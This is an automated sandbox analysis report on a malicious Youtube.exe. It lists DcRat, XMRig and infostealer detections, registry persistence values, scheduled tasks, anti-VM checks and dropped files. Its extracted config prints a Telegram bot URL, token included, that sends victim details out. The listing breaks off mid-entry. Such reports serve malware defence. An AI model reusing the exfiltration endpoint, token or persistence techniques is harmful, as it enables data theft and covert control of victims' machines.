Analysis
-
max time kernel
1800s -
max time network
1801s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
17-07-2024 13:10
General
-
Target
Youtube.exe
-
Size
8.7MB
-
MD5
d25ebdfc04bdadea74017fa72f90781f
-
SHA1
f7278c4d04fc4db888368e0245d7607d8bcbb557
-
SHA256
9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f
-
SHA512
77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71
-
SSDEEP
196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%204f1ca97b69752bcaadf13b0dd4a54c66c43cb077%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ELEOLWUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%5CInternet%20Explorer%5CRegistry.ex
Signatures
-
DcRat 38 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 2692 schtasks.exe 1712 schtasks.exe 4632 schtasks.exe 4464 schtasks.exe 1080 schtasks.exe 2788 schtasks.exe 3352 schtasks.exe 848 schtasks.exe 2320 schtasks.exe 2276 schtasks.exe 4864 schtasks.exe 2020 schtasks.exe 2180 schtasks.exe 1384 schtasks.exe 3360 schtasks.exe 4116 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings DCRatBuild.exe 3740 schtasks.exe 4568 schtasks.exe 4832 schtasks.exe 688 schtasks.exe 2844 schtasks.exe 236 schtasks.exe 2556 schtasks.exe 2064 schtasks.exe 5996 schtasks.exe 988 schtasks.exe 5004 schtasks.exe 3948 schtasks.exe 1916 schtasks.exe 6116 schtasks.exe 5152 schtasks.exe 1440 schtasks.exe 2476 schtasks.exe 5272 schtasks.exe 4520 schtasks.exe 2800 schtasks.exe 3572 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\", \"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\", \"C:\\winNet\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\", \"C:\\Users\\Default\\SendTo\\sppsvc.exe\", \"C:\\Program Files\\Internet Explorer\\Registry.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\", \"C:\\winNet\\explorer.exe\", \"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\", \"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\", \"C:\\winNet\\csrss.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\winNet\\winlogon.exe\"" Refcrt.exe -
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4832 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1916 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2476 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1384 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2276 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3740 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1440 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2320 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2800 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4864 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2844 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3572 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 988 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4464 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3360 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 236 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 688 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1080 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3948 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2180 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3352 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 848 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4568 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4632 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5004 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4116 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2064 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5272 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5996 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5152 3676 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2692 3676 schtasks.exe 95 -
resource yara_rule behavioral1/files/0x000400000002aaf5-4.dat dcrat behavioral1/memory/3440-43-0x0000000000400000-0x0000000000CC7000-memory.dmp dcrat behavioral1/files/0x000100000002ab4b-67.dat dcrat behavioral1/memory/4352-72-0x0000000000400000-0x000000000069B000-memory.dmp dcrat behavioral1/files/0x000100000002ab4d-84.dat dcrat behavioral1/memory/2944-86-0x0000000000BB0000-0x0000000000D34000-memory.dmp dcrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/5960-2970-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2971-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2977-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2976-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2978-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2975-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2974-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-2989-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-3023-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-3025-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/5960-3024-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2240 powershell.exe 5072 powershell.exe 1476 powershell.exe 1388 powershell.exe 5924 powershell.exe 5172 powershell.exe 5792 powershell.exe 2588 powershell.exe 4864 powershell.exe 128 powershell.exe 4048 powershell.exe 5160 powershell.exe 4652 powershell.exe 5108 powershell.exe 4504 powershell.exe 776 powershell.exe 5960 powershell.exe 1260 powershell.exe 1880 powershell.exe 3344 powershell.exe 5140 powershell.exe 4860 powershell.exe 5964 powershell.exe 5956 powershell.exe 4712 powershell.exe 1528 powershell.exe 5912 powershell.exe 2016 powershell.exe 2232 powershell.exe 5016 powershell.exe 5920 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/3440-43-0x0000000000400000-0x0000000000CC7000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Executes dropped EXE 64 IoCs
pid Process 4352 Result.exe 2756 DCRatBuild.exe 976 Bloxstrap.exe 1592 Frage build.exe 4884 SolaraBootstrapper.exe 2680 solara.exe 2944 Refcrt.exe 988 Registry.exe 5180 ComContainerbrowserRefRuntime.exe 4196 Roblox.exe 5764 conhost.exe 568 Bloxstrap.exe 5744 msiexec.exe 2064 sihost64.exe 5808 vc_redist.x64.exe 3568 vc_redist.x64.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 3696 Registry.exe 4568 explorer.exe 5364 sppsvc.exe 4660 dllhost.exe 484 spoolsv.exe 2012 csrss.exe 4724 msiexec.exe 2652 sppsvc.exe.exe 2932 msiexec.exe 3004 Registry.exe.exe 5740 explorer.exe.exe 2692 msiexec.exe 1296 wscript.exe 3156 dllhost.exe.exe 2960 msiexec.exe 5172 spoolsv.exe.exe 3220 csrss.exe.exe 4252 msiexec.exe 5488 msiexec.exe 5964 msiexec.exe 5444 backgroundTaskHost.exe 1140 wscript.exe.exe 3728 msiexec.exe 1916 backgroundTaskHost.exe.exe 3908 msiexec.exe 5164 explorer.exe 720 sppsvc.exe 132 Registry.exe 5956 winlogon.exe 4008 System.exe 3156 Roblox.exe 1956 Registry.exe.exe 2012 msiexec.exe 1888 msiexec.exe 1100 explorer.exe.exe 3100 msiexec.exe 5032 winlogon.exe.exe 4972 sppsvc.exe.exe 5444 msiexec.exe 2652 System.exe.exe 5856 csrss.exe 4784 dllhost.exe 3364 spoolsv.exe 4576 msiexec.exe 1992 csrss.exe.exe 4948 dllhost.exe.exe 5312 msiexec.exe -
Loads dropped DLL 17 IoCs
pid Process 5196 MsiExec.exe 5196 MsiExec.exe 5364 MsiExec.exe 5364 MsiExec.exe 5364 MsiExec.exe 5364 MsiExec.exe 5364 MsiExec.exe 5556 MsiExec.exe 5556 MsiExec.exe 5556 MsiExec.exe 5196 MsiExec.exe 3568 vc_redist.x64.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/3372-3618-0x0000000180000000-0x0000000180B57000-memory.dmp themida behavioral1/memory/3372-3763-0x0000000180000000-0x0000000180B57000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\winNet\\winlogon.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\SendTo\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\winNet\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\winNet\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Windows\\IdentityCRL\\INT\\backgroundTaskHost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Default\\SendTo\\sppsvc.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Internet Explorer\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files\\Internet Explorer\\Registry.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\winNet\\winlogon.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\win32\\bridge\\System.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\spoolsv.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\Admin\\AppData\\Local\\msiexec.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Windows NT\\TableTextService\\en-US\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\"" Refcrt.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 19 2244 msiexec.exe 21 2244 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 45 raw.githubusercontent.com 60 raw.githubusercontent.com 63 raw.githubusercontent.com 100 raw.githubusercontent.com 170 raw.githubusercontent.com 42 raw.githubusercontent.com 137 raw.githubusercontent.com 146 raw.githubusercontent.com 154 raw.githubusercontent.com 163 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 10 ipinfo.io 30 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\f9wobl.exe csc.exe File created \??\c:\Windows\System32\CSC6EDE1823CE8C44998F71C1B5779EF3EF.TMP csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3372 cd57e4c171d6e8f5ea8b8f824a6a7316.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3956 set thread context of 5960 3956 conhost.exe 269 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\nodejs\node_modules\npm\node_modules\abort-controller\dist\abort-controller.umd.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\glob\glob.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\fetcher.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-flush\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\registry.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\symbols.js msiexec.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe Refcrt.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-org.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\promise-inflight\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\retry\example\dns.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-audit.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-audit.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\duplexify.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-org.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\safe-buffer\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\docs\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tootallnate\once\dist\overloaded-parameters.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\clean.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\.github\workflows\node-gyp.yml msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\lib\encoding.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\debug.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\version.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\fs\lib\common\node.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\store.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\link.js msiexec.exe File created C:\Program 